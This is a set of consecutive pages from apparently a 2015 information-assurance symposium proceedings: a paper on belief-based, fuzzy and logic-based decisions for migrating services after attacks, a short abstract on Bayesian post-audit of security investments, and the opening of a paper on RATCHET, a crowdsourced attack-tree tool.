The basic notion of service migration involves services running on the platforms of a system. Service-oriented architecture [1], [2] has been widely used in various applications. Service migration has been applied for different purposes, including service availability, service optimization, security and system survivability. While various techniques have been developed for service/process/task/virtual machine migration ([3-7], to cite a few), the management aspect of service migration, i.e., the various decisions required for an effective and cost efficient service migration process, has not been fully studied. Those management-level decisions (as compared with particular service migration techniques) provide strategic and tactical guidelines regarding when and how to migrate services in a highly dynamic and often uncertain environment in case of a security incident.

In this paper, we present a holistic approach for service migration decisions from a management perspective. The proposed decision models are based on our preliminary work on service migration determination [10], service migration strategy specification [11] and service migration scheduling [12]. Our main contribution in this paper is a holistic approach that integrates those decision components into a comprehensive framework to facilitate an effective and efficient service migration. We first present the overall structure of our approach and then discuss each decision component in more detail.

II. A HOLISTIC APPROACH FOR SERVICE MIGRATION DECISIONS

As a systematic security approach to defend against malicious actions and make the system survive devastating attacks, service migration is a system-wide process and involves multiple components of a system. As the complexity of systems and attacking techniques continuously grows, a well-planned and carefully managed service migration is crucial to minimize any damage resulting from malicious attacks. In this section, we present our holistic approach for service migration decisions, which manages and guides the underlying activities and procedures of a service migration process. As shown in Fig. 1, our approach includes three decision components: (1) determining whether a service migration is the most appropriate course of action to take in case of a malicious attack; (2) deciding the best strategy for a service migration; and (3) specifying the most effective and efficient scheduling for the service migration activities.

Fig. 1. Service migration decision components

A. Belief-based Decision Making for Service Migration

The first and most fundamental decision for a service migration is to determine whether a service migration is the



most appropriate course of action to take in a security incident, given other possible security actions including system repair and restoration, system mending and refurbishment, or simply risk acceptance (to name a few). The most appropriate security action is chosen based on the nature of the attack, the damage caused by the attack, and the system resources available to defend against the attack and recover from damage. As discussed in [10], service migration is most appropriate in case of a devastating attack, where the attacking effect is so severe that it is difficult to recover the damaged platforms or other system components quickly enough to keep the services continuously available without a noticeable interruption to users. In that case, the best strategy is to migrate those services from their current compromised platforms to other clean, healthy platforms so that those services can continue executing on the new platforms. In this way, the critical services are still available even when some platforms of the system have been compromised.

Fig. 2. Belief-based service migration decision model

Making a service migration decision requires balancing the cost of the service migration itself (e.g., suspending currently running processes, transferring the data and service programs to new platforms, and setting up the services on the new platforms) against the necessity of migrating services to avoid further loss (e.g., any direct and indirect cost resulting from the compromised platforms) [10]. A fundamental criterion for such a decision is to evaluate whether the platforms of concern have been severely damaged. Assessing the damage status of a platform is not a trivial task, given that malicious attacks have become increasingly complicated and the system resources available to conduct damage assessment and recovery are often limited in a security incident scenario. Our approach to damage assessment of a platform is to integrate damage assessment results from multiple independent intrusion detection agents. We have developed a transferable belief-based decision model [10] to represent the damage assessment about a platform from an intrusion detection agent and to combine multiple sources of such assessment outputs into an integrated, more reliable damage assessment result for that platform. As shown in Fig. 2, the damage assessment of a platform provided by an intrusion detection agent is represented as a basic belief assignment, i.e., a belief mass function on the subsets of a belief domain. Belief combination rules are then applied to integrate multiple sources of beliefs into a comprehensive belief assignment, which represents the final damage assessment of that platform. Theoretically, the combined belief assignment represents a probability distribution on all possible combinations of the damage states of the platform. Given the cost of performing different security actions (e.g., service migration, system repair and restoration, and system mending and refurbishment) in each damage state of the platform, a Bayesian decision model is developed to determine whether a service migration is the most effective and cost efficient action to take. If the overall cost of service migration is minimal, the decision justifies service migration as the most appropriate action as compared with other security approaches.
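The pipeline of combining agent beliefs and then choosing the cheapest action can be sketched as follows. This is a minimal illustration, not the model of [10]: it assumes a two-state damage frame, uses Dempster's rule for belief combination and the pignistic transform to obtain probabilities, and all mass values and costs are invented.

```python
from itertools import product

# Illustrative two-state damage frame for a platform.
FRAME = frozenset({"damaged", "healthy"})

def combine(m1, m2):
    """Combine two basic belief assignments with Dempster's rule."""
    combined, conflict = {}, 0.0
    for (b, mb), (c, mc) in product(m1.items(), m2.items()):
        inter = b & c
        if inter:
            combined[inter] = combined.get(inter, 0.0) + mb * mc
        else:
            conflict += mb * mc  # mass assigned to contradictory subsets
    return {a: v / (1.0 - conflict) for a, v in combined.items()}

def pignistic(m):
    """Spread each subset's mass evenly over its elements to get probabilities."""
    p = {s: 0.0 for s in FRAME}
    for subset, mass in m.items():
        for s in subset:
            p[s] += mass / len(subset)
    return p

# Two intrusion detection agents report mass over subsets of the frame;
# mass on the whole frame expresses "don't know".
agent1 = {frozenset({"damaged"}): 0.6, FRAME: 0.4}
agent2 = {frozenset({"damaged"}): 0.5, frozenset({"healthy"}): 0.2, FRAME: 0.3}

p = pignistic(combine(agent1, agent2))

# Invented cost of each security action in each damage state.
costs = {"migrate": {"damaged": 10, "healthy": 40},
         "repair":  {"damaged": 60, "healthy": 5}}
expected = {a: sum(p[s] * c for s, c in sc.items()) for a, sc in costs.items()}
best = min(expected, key=expected.get)
print(best)  # migrate: its expected cost is lowest under the combined belief
```

With these numbers the combined belief leans strongly toward "damaged", so migration's expected cost undercuts repair; flipping the agents' masses toward "healthy" would flip the decision.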

B. Fuzzy Inference for Service Migration Strategy

Once a decision for service migration is made, a natural next decision is which strategy to use for the service migration. In our discussion, a service migration strategy is a specification about whether the service programs, the service state and the data space need to move entirely or partially given different security and environment situations. Such a strategy provides a guideline for the underlying service migration activities and procedures to carry out.

A service migration strategy is chosen based on the damage degree of the service programs, the complexity of those service programs, and the available network capability to securely transfer service programs and data to their new platforms. In one situation, if the service programs have been severely damaged, they cannot be executed on the new platforms and therefore should not be moved. Rather, functionally equivalent programs will be generated on the new platforms in order to continuously execute the services. From a security perspective, any newly generated service programs should be resistant to the same types of attacks that occurred on the old platform. This can be achieved through techniques such as code randomization [8], [9]. In a different situation, if the service programs are only slightly damaged or even damage free, they can be readily used on the new platform and hence can be reliably migrated. Regardless of whether the service programs are moved, the service state and the data space must be saved and moved to the new platform in order for the services to be resumed from wherever they left off on their original platforms. As a general guideline for determining a service migration strategy, only a minimum amount of data and programs should be migrated whenever possible. We have identified the following three service migration strategies [11]:

Heavyweight migration: moving the entire service programs, the service state, and the data space from the current platform to a new platform;

Lightweight migration: relocating only the service state and the data space but not the service programs. Since the service programs are not moved, the system must re-generate the service code on the new platforms so that the service can be continuously provided on those new platforms;

Middleweight migration: moving part of the service programs, along with the service state and the data space, to the new platforms, and generating the remaining unmoved service program components on the new platforms in order to execute the entire service programs.



Fig. 3. Components of the Fuzzy Inference System for Service Migration Strategy

We have developed a fuzzy inference system [11] to determine a service migration strategy once a service migration decision is made. Our approach uses expert knowledge as linguistic reasoning rules and takes service program damage assessment, service program complexity, and available network capability as input. The fuzzy inference system specifies the most appropriate service migration strategy based on expert knowledge and the current system and environment factors. The fuzzy inference system includes four components, as shown in Fig. 3: (1) a knowledge base containing a set of fuzzy rules that represent the domain expert knowledge about the implications of conditions for a service migration strategy. Each rule is represented in linguistic fuzzy terms in an If-Then format, indicating the assumptions and the consequence of a logical implication; (2) a meta database containing fuzzy variables, fuzzy terms, and the membership functions of the fuzzy terms; (3) a logic inference engine for fuzzy logic reasoning, taking the crisp values of the input fuzzy variables and the fuzzy rules. Methods for condition aggregation, fuzzy rule activation and multi-rule result accumulation are defined for inference reasoning; and (4) a fuzzification interface and a defuzzification interface for input and output values, respectively. Fuzzification determines the mapping of each input crisp value to the linguistic terms of the fuzzy variable taking that value. Defuzzification converts the fuzzy inference result set to a crisp value for each output variable. Preliminary results show that our fuzzy inference system is effective in determining the most appropriate strategy for service migration in a particular security incident scenario [11].
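The four components above can be sketched in a deliberately simplified form. The membership functions and rules below are invented for illustration; the actual system [11] also takes network capability as an input and performs a full defuzzification step, whereas this sketch simply picks the most activated strategy.

```python
def tri(x, a, b, c):
    """Triangular membership function peaking at b (meta database element)."""
    if x <= a or x >= c:
        return 0.0
    return (x - a) / (b - a) if x < b else (c - x) / (c - b)

# Meta database: fuzzy terms and membership functions (inputs scaled 0..1).
TERMS = {
    "damage":     {"low": lambda x: tri(x, -0.5, 0.0, 0.6),
                   "high": lambda x: tri(x, 0.4, 1.0, 1.5)},
    "complexity": {"low": lambda x: tri(x, -0.5, 0.0, 0.6),
                   "high": lambda x: tri(x, 0.4, 1.0, 1.5)},
}

# Knowledge base: If-Then rules mapping fuzzy conditions to a strategy.
RULES = [
    ((("damage", "low"), ("complexity", "high")), "heavyweight"),
    ((("damage", "low"), ("complexity", "low")), "heavyweight"),
    ((("damage", "high"), ("complexity", "low")), "lightweight"),
    ((("damage", "high"), ("complexity", "high")), "middleweight"),
]

def infer(inputs):
    """Fuzzify inputs, fire each rule with min-aggregation, accumulate with max."""
    strength = {}
    for conditions, strategy in RULES:
        act = min(TERMS[var][term](inputs[var]) for var, term in conditions)
        strength[strategy] = max(strength.get(strategy, 0.0), act)
    # Simplified "defuzzification": choose the most activated strategy.
    return max(strength, key=strength.get), strength

strategy, _ = infer({"damage": 0.9, "complexity": 0.2})
print(strategy)  # lightweight: heavy damage, simple programs -> regenerate code
```

High damage with low complexity fires the lightweight rule most strongly, matching the intuition that badly damaged but simple programs are cheaper to regenerate than to move.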

C. Logic Reasoning for Service Migration Scheduling

The third component of our holistic approach for service migration decisions is service scheduling/arrangement. This component determines an effective arrangement for each service to migrate from its compromised platform to a clean, healthy one: which service is to migrate to which platform, given the available system resources and the services' functional and security requirements. A service migration schedule provides a timetable to seamlessly move a set of services to their corresponding new platforms without noticeable interruptions to users.

Given the time sensitivity of user services, service migration scheduling must be conducted as quickly as possible so that the migration activities can start immediately. In the meantime, service migration must not violate any constraints specified based on service functionalities and system security. From a service functionality perspective, any platform hosting the migrated services must have the capability and resources to support the essential functions of those services. The inherent relationships among the set of services to be migrated (e.g., dependency, sequencing, or exclusion) must also be maintained on those new platforms. From a service quality and user requirement perspective, service priority, response time, and throughput must be ensured during and after a service migration. A set of service migration constraint rules has been defined [12], and any valid service migration schedule must follow those rules. Table I shows a summary of those constraint rules, where a set of services S is scheduled to migrate to a set of platforms P. Essentially, service migration scheduling is a mapping from S to P such that the constraint rules are satisfied.

TABLE I. SERVICE MIGRATION CONSTRAINT RULES [12]

Functional Constraint Rules:

- Unique platform rule – for each Si ∈ S, there exists a unique platform Pj ∈ P such that Si is scheduled to migrate to Pj, denoted Si → Pj. Each resource required by Si to operate must be provided by Pj.

- Resource constraint rule – for each resource Rk, the total quantity of Rk required by all the m services scheduled to migrate to Pj must be no more than the quantity of Rk that Pj can provide, denoted Nj_k. For any platform Pj and any resource Rk, with the sum taken over the m services Si such that Si → Pj:

    Σ_{i=1}^{m} Ni_k ≤ Nj_k

Semantic Constraint Rules:

- All-inclusion rule – for a set of services {Si, Sj, …, Sk} ⊆ S that have a strong resource correlation or must be executed in a tightly coupled fashion, Si, Sj, …, Sk must all be scheduled to migrate to the same platform.

- All-dependency rule – for Si ∈ S that functionally depends on a set of services {Sm, …, Sn} ⊆ S, if Si is scheduled to migrate to a platform Pj ∈ P, then Sm, …, Sn must also be scheduled to migrate to the same platform Pj.

- Selective-dependency rule – for Si ∈ S that functionally depends on the services in one of t sets of services {L1, L2, …, Lt}, where L1 ⊆ S, L2 ⊆ S, …, Lt ⊆ S and L1 ∩ L2 ∩ … ∩ Lt = Ø, if Si is scheduled to migrate to a platform Pj ∈ P, then all the services in at least one Lj (1 ≤ j ≤ t) should also be scheduled to migrate to Pj.

- Exclusion rule – for Si ∈ S that has an exclusion relationship with any service in {Sk, …, St} ⊆ S, Si must not be scheduled to migrate to the same platform as any of those services. This exclusion is due to reasons such as resource conflicts, function incompatibility, or control independency.
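The constraint rules above can be read as a validity check over a candidate mapping from S to P. The following sketch illustrates that check; the data structures and function names are illustrative assumptions for this note, not the authors' implementation.

```python
def is_valid_schedule(schedule, provides, requires, groups, depends, excludes):
    """Check a candidate schedule {service: platform} against the Table I rules.
    provides: {platform: {resource: quantity}}   (what each platform offers)
    requires: {service: {resource: quantity}}    (what each service needs)
    groups:   list of service sets that must migrate together (all-inclusion)
    depends:  {service: set of services it depends on} (all-dependency)
    excludes: {service: set of services it must not share a platform with}
    The unique platform rule is implicit: a dict maps each service to one platform.
    """
    # Resource constraint rule: per-resource demand must not exceed supply.
    for platform, supplied in provides.items():
        hosted = [s for s, p in schedule.items() if p == platform]
        for resource, available in supplied.items():
            demand = sum(requires[s].get(resource, 0) for s in hosted)
            if demand > available:
                return False
    # Unique platform rule (second clause): every needed resource is offered.
    for service, platform in schedule.items():
        if any(r not in provides[platform] for r in requires[service]):
            return False
    # All-inclusion rule: tightly coupled services share one platform.
    for group in groups:
        if len({schedule[s] for s in group}) > 1:
            return False
    # All-dependency rule: dependencies migrate to the same platform.
    for service, deps in depends.items():
        if any(schedule[d] != schedule[service] for d in deps):
            return False
    # Exclusion rule: excluded pairs never share a platform.
    for service, foes in excludes.items():
        if any(schedule[f] == schedule[service] for f in foes):
            return False
    return True

# Illustrative data: two platforms, three services.
provides = {"P1": {"cpu": 4}, "P2": {"cpu": 2}}
requires = {"S1": {"cpu": 2}, "S2": {"cpu": 2}, "S3": {"cpu": 1}}
groups = [{"S1", "S2"}]        # S1 and S2 are tightly coupled
depends = {"S3": set()}
excludes = {"S3": {"S1"}}      # S3 must not share a platform with S1
ok = is_valid_schedule({"S1": "P1", "S2": "P1", "S3": "P2"},
                       provides, requires, groups, depends, excludes)
```

In the example, placing S1 and S2 together on P1 and S3 on P2 satisfies every rule, whereas splitting S1 and S2 would violate the all-inclusion rule.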

A logic system has been developed for service migration scheduling (see [12] for more detail). We have developed a set of logic constructs (e.g., formulas and predicates) and inference rules as the essential elements of the logic-based reasoning system. A logic predicate represents the resources required by a service, the resources provided by a platform, or an arrangement mapping a service to a platform. The inference rules define the core of our logic reasoning process, i.e., generating a valid service migration schedule, if one exists, that relocates each service to a platform without violating any of the defined constraint rules. The service migration constraints themselves are encoded as the logic conditions and implications of the inference rules. A logic approach is used for service migration scheduling because it is flexible and makes it easy to define new constraint rules as more complicated user requirements are defined. A logic approach also provides a more rigorous method to analyze, evaluate, and verify the correctness of the proposed system.

[Figure: Architecture of the service migration strategy fuzzy inference system – a knowledge base of fuzzy rules representing domain expert knowledge about the implications of conditions for different service migration strategies; a meta database of fuzzy variables, fuzzy terms, and the membership functions of the fuzzy terms; a logic inference engine performing fuzzy reasoning over the crisp values of the input fuzzy variables and the fuzzy rules; and fuzzification and defuzzification interfaces for input and output values.]

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 16
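The four components of the fuzzy inference system can be sketched in miniature as below. The variables, terms, and rules here are illustrative assumptions chosen for the sketch, not the paper's actual rule base, and the defuzzification step uses a weighted average of output term centers, a common simplification of centroid defuzzification.

```python
def tri(a, b, c):
    """Triangular membership function (a meta database entry)."""
    def mu(x):
        if x <= a or x >= c:
            return 0.0
        return (x - a) / (b - a) if x <= b else (c - x) / (c - b)
    return mu

# Meta database: fuzzy terms and their membership functions (assumed names).
threat = {"low": tri(-0.5, 0.0, 0.5), "high": tri(0.5, 1.0, 1.5)}
urgency_terms = {"defer": 0.2, "migrate_now": 0.9}  # output term centers

# Knowledge base: rules mapping input conditions to migration strategies.
rules = [("low", "defer"), ("high", "migrate_now")]

def infer(threat_level):
    """Fuzzify the crisp input, fire the rules, and defuzzify by a
    weighted average of the output term centers."""
    strengths = {out: threat[term](threat_level) for term, out in rules}
    total = sum(strengths.values())
    if total == 0:
        return 0.0
    return sum(urgency_terms[o] * w for o, w in strengths.items()) / total

urgency = infer(0.9)  # a high threat level yields a high urgency
```

A real rule base would combine several input variables (e.g., service criticality, available capacity) per rule; the structure of fuzzification, rule firing, and defuzzification stays the same.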

III. SIMULATIONS AND FUTURE WORK

Most components of the proposed holistic approach have been developed to validate the methodology. The fuzzy inference system for service migration strategy was implemented using the jFuzzyLogic package. A JProlog program was developed for service migration scheduling. Simulations show that the scheduler program can generate a valid service migration schedule in a short time for a reasonably large set of services to be migrated to new platforms. We have also developed an agent-based system for service migration to illustrate how service agents can manage and coordinate the migration of services to their new platforms. As an ongoing effort, we are developing a prototype system that integrates all the decision components into a comprehensive service migration decision framework with: (1) fully functional modules to make a service migration decision, determine the most appropriate strategy, and produce a valid service migration arrangement based on current system resources and service functional and semantic requirements; and (2) a user-friendly GUI that interacts with human users through visualized input and output. Our future work includes formal analysis of the proposed decision models and validation of the prototype system in real case scenarios.
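The scheduler's search can be pictured as backtracking over the constraint rules, in the spirit of the logic program described above. The sketch below is an illustrative reimplementation under simplified rules (resource and exclusion constraints only), not the authors' JProlog code.

```python
def schedule(services, platforms, requires, provides, excludes, assigned=None):
    """Return a {service: platform} mapping satisfying the resource and
    exclusion rules, or None if no valid schedule exists."""
    assigned = dict(assigned or {})
    if len(assigned) == len(services):
        return assigned
    s = services[len(assigned)]          # next unassigned service
    for p in platforms:
        # Exclusion rule: s must not share p with an excluded service.
        if any(assigned.get(e) == p for e in excludes.get(s, ())):
            continue
        # Resource constraint rule: remaining capacity on p must cover s.
        used = {}
        for t, q in assigned.items():
            if q == p:
                for r, n in requires[t].items():
                    used[r] = used.get(r, 0) + n
        if all(used.get(r, 0) + n <= provides[p].get(r, 0)
               for r, n in requires[s].items()):
            result = schedule(services, platforms, requires, provides,
                              excludes, {**assigned, s: p})
            if result is not None:
                return result
    return None  # no platform works for s: backtrack

# Illustrative instance: two services that exclude each other.
services = ["S1", "S2"]
platforms = ["P1", "P2"]
requires = {"S1": {"cpu": 2}, "S2": {"cpu": 2}}
provides = {"P1": {"cpu": 2}, "P2": {"cpu": 2}}
excludes = {"S2": {"S1"}}
plan = schedule(services, platforms, requires, provides, excludes)
```

A Prolog engine performs essentially this depth-first search automatically once the constraints are stated as clauses, which is why the logic formulation stays compact as new rules are added.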

IV. CONCLUSION

In this paper, we present our work-in-progress on a holistic approach for service migration decisions, including service migration determination, strategy specification, and scheduling arrangement. These decision components represent a series of decision-making processes for managing and guiding an effective and assured service migration during a security incident. As a dynamic approach to responding to malicious attacks, service migration improves system survivability and service availability by strategically relocating critical services from their compromised platforms to other clean, healthy platforms. Our approach provides the decision terminology and management process for an effective and efficient service migration.

ACKNOWLEDGMENT

This material is based upon work supported by the US Air Force Office of Scientific Research (AFOSR) under Award FA9550-12-1-0131. Any opinions, findings, and conclusions or recommendations expressed in this publication are those of the author and do not necessarily reflect the views of AFOSR.

REFERENCES

[1] D. Booth et al. (editors), “W3C Working Group Note 11: Web Services Architecture,” World Wide Web Consortium (W3C), February 2004, http://www.w3.org/TR/ws-arch/#stakeholder.

[2] T. Erl, “Service-Oriented Architecture: Concepts, Technology, and Design”, Prentice Hall PTR Upper Saddle River, NJ, USA, 2005.

[3] T. Wood, P. Shenoy, A. Venkataramani, and M. Yousif, “Black-Box and Gray-Box Strategies for Virtual Machine Migration,” in Proc. of the 4th USENIX Conference on Networked Systems Design and Implementation, pp. 229–242, 2007.

[4] M. Mishra, A. Das, P. Kulkarni, and A. Sahoo, “Dynamic Resource Management Using Virtual Machine Migrations,” IEEE Communications Magazine, vol. 50, no. 9, pp. 34–40, 2012.

[5] S. Chakravorty, C.Mendes, and L. Kale, “Proactive Fault Tolerance in MPI Applications via Task Migration,” in Proc. of HiPC, 2006.

[6] C. Du, X.-H. Sun, and M. Wu, “Dynamic Scheduling with Process Migration,” in Proc. of IEEE CCGrid, 2007.

[7] C. Clark, K. Fraser, S. Hand, J. Hansem, E. Jul, C. Limpach, I. Pratt, and A. Warfield, “Live Migration of Virtual Machines,” in Proc. of NSDI, 2005.

[8] R. Wartell, V. Mohan, K. Hamlen, K. and Z. Lin, “Binary Stirring: Self-randomizing Instruction Addresses of Legacy x86 Binary Code”, in Proc. of ACM Conference on Computer and Communication Security, 2012.

[9] B. Anckaert, M. Jakubowski, R. Venkatesan, and K. D. Bosschere, “Run-time Randomization to Mitigate Tampering”, in Proc. of 2nd Int. Conf. on Advances in Information and Computer Security, pp. 153–168, 2007.

[10] Y. Zuo, “Belief-based Decision Making for Service Migration”, in Proc. of 48th Annual Hawaii International Conference on System Sciences, pp. 5212-5221, January 5-8, Hawaii, USA, 2015.

[11] Y. Zuo, “Fuzzy Inference for Service Migration Strategy,” in Proc. of IEEE International Conference on Electro/Information Technology, p. 8, DeKalb, IL, USA, 2015.

[12] Y. Zuo and J. Liu, “A Logic Approach for Service Migration Scheduling,” in Proc. of 9th International Conference on Cyber Warfare and Security, pp. 226–234, West Lafayette, USA, 2014.


Post-audit of Service Security Investment:

Using Simulation Approach

Hemantha S. B. Herath Department of Accounting

Goodman School of Business

Brock University, Ontario, Canada

[email protected]

Tejaswini C. Herath Department of Finance, Operations and Information Systems

Goodman School of Business

Brock University, Ontario, Canada

[email protected]

An important component of information security investment management is the post-audit process. Post-audit of capital investments in IT security is the ex-post assessment of projects to determine whether or not the intended purpose was accomplished. Bayesian learning in post-audit has immense value, since initial forecasts can be revised with sample information to assess the effectiveness of such investments. A recent article on information security investment analysis applies the Gamma conjugate family to update the technological parameters of an email intrusion prevention/detection system (IDS) in a real option model. Often, however, conjugate priors are difficult to obtain and an analytically tractable closed-form posterior may not be available. A more general approach is to use the MCMC simulation method, which allows the posterior distribution to be obtained quite efficiently.
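As a generic illustration of the conjugate updating the abstract refers to: with a Gamma(α, β) prior on a Poisson rate (e.g., intrusions detected per period by the IDS), observing counts x₁..xₙ yields the posterior Gamma(α + Σx, β + n). The specific model and parameters in the cited article may differ; the numbers below are illustrative only.

```python
def gamma_poisson_update(alpha, beta, counts):
    """Gamma-Poisson conjugate update.
    Prior: rate ~ Gamma(alpha, beta); data: Poisson counts.
    Returns the posterior (alpha, beta) and the posterior mean of the rate."""
    a_post = alpha + sum(counts)   # shape absorbs the total event count
    b_post = beta + len(counts)    # rate absorbs the number of periods
    return a_post, b_post, a_post / b_post

# Illustrative: a Gamma(2, 1) prior revised with three periods of observations.
a, b, mean = gamma_poisson_update(2.0, 1.0, [3, 5, 4])
```

When no conjugate pair like this is available, the closed-form update above is replaced by MCMC sampling from the posterior, as the authors note.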

This work was supported in part by the Social Sciences and Humanities Research Council (SSHRC) of Canada under Grant no. 410-2009-1398 and Grant no. 410-2010-1848. The authors acknowledge the research funding support from IIIA (Grant 336-332-033).



Crowdsourcing Computer Security Attack Trees

Matthew Tentilucci1, Nick Roberts1, Shreshth Kandari1, Daryl Johnson1,

Dan Bogaard1, Bill Stackpole1, and George Markowsky2

1Department of Computing Security, Rochester Institute of Technology, Rochester, NY

2School of Computing and Information Science, University of Maine, Orono, ME

Abstract—This paper describes an open-source project called RATCHET whose goal is to create software that can be used by large groups of people to construct attack trees. The value of an attack tree increases when the attack tree explores more scenarios. Crowdsourcing an attack tree reduces the possibility that some options might be overlooked. RATCHET has been tested in classroom settings with positive results. This paper gives an overview of RATCHET and describes some of the features that we plan to add.

Keywords—crowdsourcing, attack tree, security, attack surface

I. INTRODUCTION

Attack tree analysis, as described by Bruce Schneier in the book Secrets and Lies [1], is the process of analyzing how systems fail. Attack trees allow users to understand possible threats against systems, visualize those threats, and assign various metrics to determine which threats are most likely to occur. Fault tree analysis (FTA), similar to attack tree analysis, has been used since the early 1960s to perform safety and reliability evaluations in high-hazard industries, beginning with the U.S. Air Force Ballistic Systems Division [2]. While attack tree analysis and fault tree analysis are used in information technology and industrial engineering respectively, the two methods have much in common.

Crowdsourcing is the process of harnessing the contributions of a community of online users to supply services, concepts, or content. Participants bring a rich background of experience, perspective, and expertise to the problem.

Attack tree analysis is difficult to perform well, as the volume of detail that must be collected and collated to build a useful tree is large and continually growing. This project combines the ability of attack tree analysis to describe computer security threats with the power of crowdsourcing to create all-encompassing, open-source, community-created and maintained computer security attack trees.

There are several incentives to combine attack tree analysis and crowdsourcing. These include visualization of security threats, improved security, and quantification of security efforts. Benefits to the computer security community can only be realized if attack trees are sufficiently comprehensive to allow them to address credible threats to a computer system. These may include vulnerabilities in software and services, multi-step attacks, social engineering, physical security, network device security, etc. The number of attack vectors is too large for a typical organization to understand all of them. Crowdsourcing can address this problem by distributing the effort required to build a complete tree. Collaboratively built

Fig. 1. Starting the Attack Tree

attack trees can be more complete and accurate, increasing potential benefits to computing security.

Over the past year a team of faculty and students have implemented a web-based system that allows an online community of users to create attack trees viewable by the general public. The online community has the ability to promote better ideas, voting down the ones perceived as less valuable. RATCHET can be found at http://ratchet.csec.rit.edu/. RATCHET permits people to visualize attack trees, share branches, and vote on relevant information. RATCHET also provides a node-by-node description.

RATCHET combines attack tree analysis with the power of crowdsourcing to create an all-encompassing, open-source, community-created and maintained attack tree system. There are a number of reasons to combine attack tree analysis and crowdsourcing. These include visualization of security threats, improved security, and quantification of security efforts. The benefits to the computer security community afforded by attack trees can only be realized to their fullest if the attack trees created address the most relevant security threats to a system. Given the number of possible attacks, attempting to generate attack trees for all possible attacks is a task too large for small to medium sized organizations. We believe that attack trees created by crowdsourcing will be more complete and will increase the likelihood that major benefits will be realized.

II. RELATED WORK

References [3]–[5] illustrate the advantages of using attack tree analysis and fault tree analysis to model security threats. Zhang et al. [6] show how to supplement fault tree analysis models by adding privilege escalation metrics into the models. Edge et al. [7] introduce the idea of expanding the attack tree concept into a protection tree. They first create an attack tree, calculate the appropriate metrics, and then create a


Fig. 2. The Second Attack Tree

Fig. 3. The Second Attack Tree With Cost Information

protection tree to help planners allocate resources to defend against specific attacks. Roy et al. [10] take the idea of protection trees a step further, proposing attack countermeasure trees, where qualitative metrics, defense mechanisms, and probabilistic analysis can be applied to nodes directly within the tree. Bauer [8] discusses scenarios that can be turned into attack trees.

Of special interest is an open-source project called Seamonster [9]. Seamonster is a program designed to produce standalone attack trees. We will have more to say about Seamonster later in this paper.

III. PROJECT GOALS

The goals for this project include: 1) Exploring attack tree analysis and its use in quantifying computer security vulnerabilities and efforts; 2) Creating an attack tree platform that would be community created, maintained, and utilized (e.g., crowdsourced); 3) Implementing features that will facilitate the growth of a new online community focused on the creation of computer security themed attack trees.

Our goal is to have people and organizations use RATCHET to build attack trees specific to their infrastructure and needs, and to share them with others. We expect that the attack trees produced and shared in this manner will greatly benefit the entire Information Technology (IT) community. There currently exists no definitive information source or tool for computer security engineers to use for guidance when adding new devices or services to a network. With attack tree analysis, determining points of failure or faults in current network configurations when introducing new hosts or services into an infrastructure would be more easily performed.

It is also possible that a cost and likelihood could be associated with each attack or vulnerability. With this information, an IT shop might apply a score to their computer security efforts. Such a score could be used as a metric against which to judge whether one is improving one's defenses. Metrics might be used to justify the cost of new devices or services, or to validate the need for a configuration change. Utilizing an attack tree can provide computer security professionals with access to measurable data and help them evaluate the value of adding a new security system or software patch.

IV. ORIGINAL VISION

A basic attack tree would be focused around a central root node or objective. Such an objective might be to obtain a user's password. Branching off of a root node, one could create multiple methods to obtain customer data. Fig. 1 shows an example of how one might start an attack tree. The next step might explore what methods one would use to search for a written copy of the password, bribe the user for his or her password, or utilize a keylogger to steal the password. At this stage, a new community of researchers, IT professionals, pentesters, or security-minded individuals becomes a vital part of the process. For example, one individual might know how to burglarize an office, but not how to exploit a system and install a keylogger. Working together, a group is more likely to create a detailed attack tree using different methods of reaching the same goal than would the individuals working alone. An example is shown in Fig. 2.

By using attack trees, organizations can determine where to focus their efforts in order to minimize potential threats. Attack trees that include associated costs, such as the attack tree in Fig. 3, are extremely useful. The attack tree in Fig. 3 can help determine which attacks might be preferred by an attacker who would carry out a low-cost attack.
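The low-cost-attack analysis that such cost-annotated trees enable can be sketched as follows. The representation is an assumption made for this sketch (leaves carry a cost, OR nodes take the cheapest child, AND nodes require every child so costs add), and the example tree is illustrative, not the one in Fig. 3.

```python
def cheapest_attack(node):
    """Minimum cost for an attacker to achieve the goal at this node."""
    kind = node.get("kind", "leaf")
    if kind == "leaf":
        return node["cost"]
    child_costs = [cheapest_attack(c) for c in node["children"]]
    # OR: any one child suffices; AND: all children are required.
    return min(child_costs) if kind == "or" else sum(child_costs)

# Illustrative tree for the "obtain a user's password" objective.
password = {
    "kind": "or",
    "children": [
        {"cost": 500},                    # bribe the user
        {"kind": "and", "children": [     # install a keylogger:
            {"cost": 100},                #   break into the office
            {"cost": 50},                 #   plant the device
        ]},
    ],
}
```

Here the keylogger branch (100 + 50 = 150) beats bribery (500), so a defender would prioritize hardening that branch first.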

Price points may be one method to analyze the value of a given problem, but costs might vary between organizations based on any number of unrelated factors. Some organizations are less cost-conscious than others. This realization led to the concept that information might need to be assigned different levels of visibility, with some of it being global and other items visible only to a particular user. Different attack methods might be displayed with orientation attributes related to different participants (user-oriented vs. server-oriented, for example). Some attributes that might be of use in analyzing cyber attacks


Fig. 4. A More Elaborate Attack Tree

are presented in Table I. A more elaborate attack tree is shown in Fig. 4.

V. RATCHET

RATCHET is a prototype of a system that can leverage crowdsourcing for the development of attack trees. Web applications provide a very convenient way to reach a lot of people. If properly designed, they require only access to a browser, which most computer users have. Fig. 5 shows the home page of RATCHET.

The researchers and students involved in this project all collaborated in gathering ideas for what the system should accomplish, how it might be used, and what issues it might face. The application was designed for a collaborative audience of users who would have sufficient knowledge and the ability to help the system grow. The system can handle both simple attack trees, e.g., a password attack, and complex attack trees, e.g., attacking an operating system.

RATCHET has the ability to allow users to build a new tree, node by node. Every node in the tree has an area for comments and the capability of allowing users to vote in favor or against it. Any node of any tree can be duplicated and attached to any other node, either within the same tree or in completely

Fig. 5. RATCHET Homepage


TABLE I. EXAMPLE ATTRIBUTES FOR ATTACK TREE ANALYSIS

Attribute – Scale
Cost – Dollars
Difficulty – Easy vs. Challenging
Physical Presence Required – Intrusive vs. Non-Intrusive
Probability – Possible vs. Impossible
Special Equipment (Resources) Required – Availability & Traceability
Risk of Detection – Evidence Left Behind or Stealthiness
Skill Level Required – Novice or Expert

different trees. Each attack tree is displayed visually using Scalable Vector Graphics (SVG, an HTML5 technology that natively allows for dynamic drawing within a web page [11]). Users have the ability to zoom, pan, or select any of the created nodes, view the comments and add their own ideas, vote on a node's relevance, or add a new child node of their own.

